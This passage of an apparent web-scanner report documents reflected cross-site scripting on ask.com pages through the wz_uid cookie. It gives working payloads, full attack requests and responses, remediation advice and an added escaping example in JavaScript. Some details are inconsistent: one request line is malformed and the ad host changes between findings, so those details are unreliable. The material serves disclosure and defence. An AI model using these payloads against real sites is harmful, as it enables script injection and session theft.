The value of the wz_uid cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload 8dabc'-alert(1)-'59d45fee295 was submitted in the wz_uid cookie and was echoed unmodified in the application's response. The payload's first quote terminates the literal, -alert(1)- is then evaluated as part of the expression, and the second quote opens a new string so the statement remains syntactically valid.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

A redirection occurred between the attack request and the response containing the echoed input, so the redirection must be followed for the attack to succeed; a browser follows it automatically.

Because the data copied into the response is submitted in a cookie, the issue is not trivially exploitable against another user: the attacker must first find a way to set the wz_uid cookie in the victim's browser. Every cookie in the response below is scoped to Domain=.ask.com, so a flaw on any ask.com subdomain that lets an attacker write cookies for the parent domain would provide that means; until one is found, this limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible the application should not place user data inside inline script at all; where a value must be written into a string literal, every character outside [A-Za-z0-9] should be encoded as \xHH before insertion. HTML entity encoding is not a substitute in this context, because entities are not decoded inside a script block.

Request

GET /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA8dabc'-alert(1)-'59d45fee295; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 18:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:00:49 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAwOjQ5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:49 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:49 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:49 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 89393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA8dabc'-alert(1)-'59d45fee295;u4=;u3=;u2=0;ord=-1137438782?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog
...[SNIP]...

2.288. http://www.ask.com/video [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /video

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload aa397'-alert(1)-'4521f1aa434 was submitted in the wz_uid cookie and was echoed unmodified in the application's response. The payload's first quote terminates the literal, -alert(1)- is then evaluated as part of the expression, and the second quote opens a new string so the statement remains syntactically valid.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

A redirection occurred between the attack request and the response containing the echoed input, so the redirection must be followed for the attack to succeed; a browser follows it automatically.

Because the data copied into the response is submitted in a cookie, the issue is not trivially exploitable against another user: the attacker must first find a way to set the wz_uid cookie in the victim's browser. Every cookie in the response below is scoped to Domain=.ask.com, so a flaw on any ask.com subdomain that lets an attacker write cookies for the parent domain would provide that means; until one is found, this limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible the application should not place user data inside inline script at all; where a value must be written into a string literal, every character outside [A-Za-z0-9] should be encoded as \xHH before insertion. HTML entity encoding is not a substitute in this context, because entities are not decoded inside a script block.

Request

GET /video?qsrc=0&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDAaa397'-alert(1)-'4521f1aa434; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:01:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:01:50 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir5fb41; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAxOjUwLVVUQw%3D%3D&po=0&pp=dir5fb41; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:01:50 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:01:50 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 89506

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDAaa397'-alert(1)-'4521f1aa434;u4=;u3=;u2=0;ord=-844384763?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

2.289. http://www.ask.com/web [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload 1db9e'-alert(1)-'dc71632913f was submitted in the wz_uid cookie and was echoed unmodified in the application's response. The payload's first quote terminates the literal, -alert(1)- is then evaluated as part of the expression, and the second quote opens a new string so the statement remains syntactically valid.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

A redirection occurred between the attack request and the response containing the echoed input, so the redirection must be followed for the attack to succeed; a browser follows it automatically.

Because the data copied into the response is submitted in a cookie, the issue is not trivially exploitable against another user: the attacker must first find a way to set the wz_uid cookie in the victim's browser. Every cookie in the response below is scoped to Domain=.ask.com, so a flaw on any ask.com subdomain that lets an attacker write cookies for the parent domain would provide that means; until one is found, this limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible the application should not place user data inside inline script at all; where a value must be written into a string literal, every character outside [A-Za-z0-9] should be encoded as \xHH before insertion. HTML entity encoding is not a substitute in this context, because entities are not decoded inside a script block.

Request

GET /web HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA1db9e'-alert(1)-'dc71632913f; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:02:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:02:51 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAyOjUxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:02:51 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:02:51 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA1db9e'-alert(1)-'dc71632913f;u4=;u3=;u2=0;ord=-1145871071?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog
...[SNIP]...

2.290. http://www.ask.com/web [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload 7eb3c'-alert(1)-'ee3526f5f97 was submitted in the wz_uid cookie and was echoed unmodified in the application's response. The payload's first quote terminates the literal, -alert(1)- is then evaluated as part of the expression, and the second quote opens a new string so the statement remains syntactically valid.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the data copied into the response is submitted in a cookie, the issue is not trivially exploitable against another user: the attacker must first find a way to set the wz_uid cookie in the victim's browser. Every cookie in the response below is scoped to Domain=.ask.com, so a flaw on any ask.com subdomain that lets an attacker write cookies for the parent domain would provide that means; until one is found, this limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible the application should not place user data inside inline script at all; where a value must be written into a string literal, every character outside [A-Za-z0-9] should be encoded as \xHH before insertion. HTML entity encoding is not a substitute in this context, because entities are not decoded inside a script block.

Request

GET /web?q=What+causes+brain+freeze%3F&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA7eb3c'-alert(1)-'ee3526f5f97; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:09:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:09:00 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..|V2hhdCtjYXVzZXMrYnJhaW4rZnJlZXplJTNG; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjA5OjAwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:09:00 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:09:00 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 118381


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - What's Yo
...[SNIP]...
<iframe id="mar" src="http://fls.vulnerable.ad.partner/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0C41C9EC70F2B3A933ADE477A41477DA7eb3c'-alert(1)-'ee3526f5f97;u4=;u3=;u2=0;ord=-475526707?" width="1" height="1" frameborder="0">
...[SNIP]...

2.291. http://www.ask.com/web [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the wz_uid cookie is copied into the value of an HTML tag attribute delimited by double quotation marks. The payload ec63a"><script>alert(1)</script>7e00dc9945 was submitted in the wz_uid cookie and was echoed unmodified in the application's response. The payload's double quote ends the attribute value and the following > ends the iframe start tag, so the <script> element that follows is parsed as markup and executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the data copied into the response is submitted in a cookie, the issue is not trivially exploitable against another user: the attacker must first find a way to set the wz_uid cookie in the victim's browser. Every cookie in the response below is scoped to Domain=.ask.com, so a flaw on any ask.com subdomain that lets an attacker write cookies for the parent domain would provide that means; until one is found, this limitation considerably mitigates the impact of the vulnerability.
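
An added example for the attribute context of this finding, not code from this report or from Ask.com: the cookie value is placed in the double-quoted src attribute of an iframe (mirroring the response below), once raw and once HTML-attribute-escaped, and a small scanner that follows the HTML tokenizer's distinction between text and quoted attribute values lists which elements each version produces. The template strings and the scanner are constructed for illustration. The JavaScript-string escaping that suits issues 2.286 to 2.290 is not the right tool here, and attribute escaping is not the right tool there: each context has its own rules, and the parser that reads the value decides which applies.

```javascript
// Added example (not Ask.com code): the wz_uid cookie reflected into a
// double-quoted HTML attribute, the escaping that context needs, and a check
// of which elements the HTML parser would see in each version.

// Escape the five characters that can change meaning inside an attribute
// value; the parser decodes the entities back to the original characters.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Template mirroring the iframe in the response below (constructed here).
const TRACKER = 'http://fls.vulnerable.ad.partner/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=';

function renderIframeVulnerable(wzUid) {
  return '<iframe src="' + TRACKER + wzUid +
    ';u4=;u3=;u2=0;ord=-782283219?" width="1" height="1" frameborder="0"></iframe>';
}

function renderIframeHardened(wzUid) {
  return '<iframe src="' + TRACKER + escapeHtmlAttr(wzUid) +
    ';u4=;u3=;u2=0;ord=-782283219?" width="1" height="1" frameborder="0"></iframe>';
}

// Minimal tag scanner: walks the markup the way the tokenizer does, treating
// '<' followed by a name as a tag and ignoring '>' and '<' inside quoted
// attribute values.  Returns the tag names in order ("/name" for end tags).
function tagNames(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    const closing = html[j] === '/';
    if (closing) j++;
    const start = j;
    while (j < html.length && /[A-Za-z0-9]/.test(html[j])) j++;
    if (j === start) { i++; continue; }            // a bare '<' in text
    names.push((closing ? '/' : '') + html.slice(start, j).toLowerCase());
    let quote = null;                               // skip attributes to '>'
    while (j < html.length) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
      j++;
    }
    i = j + 1;
  }
  return names;
}

// Constructed input: the payload from the request below.
const PAYLOAD = 'ec63a"><script>alert(1)</script>7e00dc9945';
console.log(tagNames(renderIframeVulnerable(PAYLOAD)));  // [ 'iframe', 'script', '/script', '/iframe' ]
console.log(tagNames(renderIframeHardened(PAYLOAD)));    // [ 'iframe', '/iframe' ]
```

In the raw version the scanner reports a script element between the iframe's start and end tags, exactly what the browser will create and run; in the escaped version the payload stays inside the src value as text and only the iframe remains. The escaped value is still the attacker's string, so it will reach the ad host as part of the URL, but it can no longer change the markup of the page.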

Request

GET /web?q=What+causes+brain+freeze%3F&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=ec63a"><script>alert(1)</script>7e00dc9945; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:08:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:08:43 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..|V2hhdCtjYXVzZXMrYnJhaW4rZnJlZXplJTNG; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjA4OjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:08:43 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:08:43 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 118345


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - What's Yo
...[SNIP]...
<iframe src="http://fls.vulnerable.ad.partner/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=ec63a"><script>alert(1)</script>7e00dc9945;u4=;u3=;u2=0;ord=-782283219?" width="1" height="1" frameborder="0">
...[SNIP]...
